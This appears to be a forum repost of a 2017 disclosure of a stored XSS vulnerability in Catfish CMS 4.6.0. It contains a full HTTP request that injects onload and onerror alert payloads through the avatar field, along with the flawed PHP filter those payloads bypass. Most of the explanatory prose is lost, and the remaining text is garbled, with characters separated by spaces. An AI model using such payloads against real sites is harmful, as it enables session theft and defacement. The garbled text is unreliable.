搜索

[12028] 2017-11-19_鲶鱼CMS存储XSS漏洞披露

文档创建者:s7ckTeam
浏览次数:15
最后更新:2025-01-18
2017-11-19_鲶鱼CMS存储XSS漏洞披露 C M S X S S D e e n   F r e e B u f   2 0 1 7 - 1 1 - 1 9 * D e e n F r e e B u f C a t f i s h ( )   C M S P H P c m s X S S V 4 . 6 . 0 c m s 1 .   2 .   3 .  
x 9 6 a v a t a r 3 1 3 P O S T   / d a i m a s h e n j i / C a t f i s h C M S - 4 . 6 . 0 / i n d e x . p h p / u s e r / i n d e x / t o u x i a n g . h t m l   H T T P / 1 . 1 H o s t :   1 2 7 . 0 . 0 . 1 U s e r - A g e n t :   M o z i l l a / 5 . 0   ( W i n d o w s   N T   6 . 1 ;   W O W 6 4 ;   r v : 5 3 . 0 )   G e c k o / 2 0 1 0 0 1 0 1   F i r e f o x / 5 3 . 0 A c c e p t :   t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 , * / * ; q = 0 . 8 A c c e p t - L a n g u a g e :   z h - C N , z h ; q = 0 . 8 , e n - U S ; q = 0 . 5 , e n ; q = 0 . 3 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e C o n t e n t - T y p e :   a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d C o n t e n t - L e n g t h :   1 3 9 R e f e r e r :   h t t p : / / 1 2 7 . 0 . 0 . 1 / d a i m a s h e n j i / C a t f i s h C M S - 4 . 6 . 0 / i n d e x . p h p / u s e r / i n d e x / t o u x i a n g . h t m l C o o k i e :   t h i n k _ v a r = z h - c n ;   P H P S E S S I D = u o 2 u 2 9 h 3 s f 9 e r 6 b j 9 f 3 d 3 6 r j 8 0 C o n n e c t i o n :   c l o s e U p g r a d e - I n s e c u r e - R e q u e s t s :   1 a v a t a r = h t t p : / / 1 2 7 . 0 . 0 . 1 / d a i m a s h e n j i / C a t f i s h C M S - 4 . 6 . 0 / d a t a / u p l o a d s / 2 0 1 7 1 1 0 9 / 0 2 2 d 8 0 4 c 4 e a 9 a f 6 6 c 1 a 1 f 9 0 1 d 7 c 0 b 6 a 1 . p n g "   o n l o a d = " a l e r t ( 1 ) "   a = " 1 . j p g & f i l e s e l e c t % 5 B % 5 D = C a t f i s h C M S - 4 . 6 . 0 / a p p l i c a t i o n / a d m i n / c o n t r o l l e r / I n d e x . p h p C a t f i s h C M S - 4 . 6 . 0 / a p p l i c a t i o n / a d m i n / c o n t r o l l e r / C o m m o n . p h p
1 .     > 2 .   j p e g , j p g , p n g , g i f   3 .     / d a t a /   o n l o a d o n e r r o r . j p g p a y l o a d   * D e e n F r e e B u f   p r o t e c t e d   f u n c t i o n   i s L e g a l P i c t u r e ( $ p i c t u r e )         {                 i f ( s t r i p o s ( $ p i c t u r e , ' > ' )   = = =   f a l s e )                 {                         $ p a t h i n f o   =   p a t h i n f o ( $ p i c t u r e ) ;                         i f ( i s s e t ( $ p a t h i n f o [ ' e x t e n s i o n ' ] ) )                         {                                 i f ( i n _ a r r a y ( $ p a t h i n f o [ ' e x t e n s i o n ' ] , [ ' j p e g ' , ' j p g ' , ' p n g ' , ' g i f ' ] )   & &   s t r i p o s ( $ p a t h i n f o [ ' d i r n a m e ' ] , ' / d a t a / ' )   ! = =   f a l s e )                                 {                                         r e t u r n   t r u e ;                                 }                         }                 }                 r e t u r n   f a l s e ;         } a v a t a r = [ h t t p : / / 1 2 7 . 0 . 0 . 1 / d a i m a s h e n j i / C a t f i s h C M S - 4 . 6 . 0 / d a t a / u p l o a d s / 2 0 1 7 1 1 0 9 / t e s t . p n g ] ( h t t p : / / 1 2 7 . 0 . 0 . 1 / d a i m a s h e n j i / C a t f i s h C M S - 4 . 6 . 0 / d a t a / u p l o a d s / 2 0 1 7 1 1 0 9 / t e s t . p n g ) "   o n e r r o r = " a l e r t ( 2 ) "   a = " 1 . j p g
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理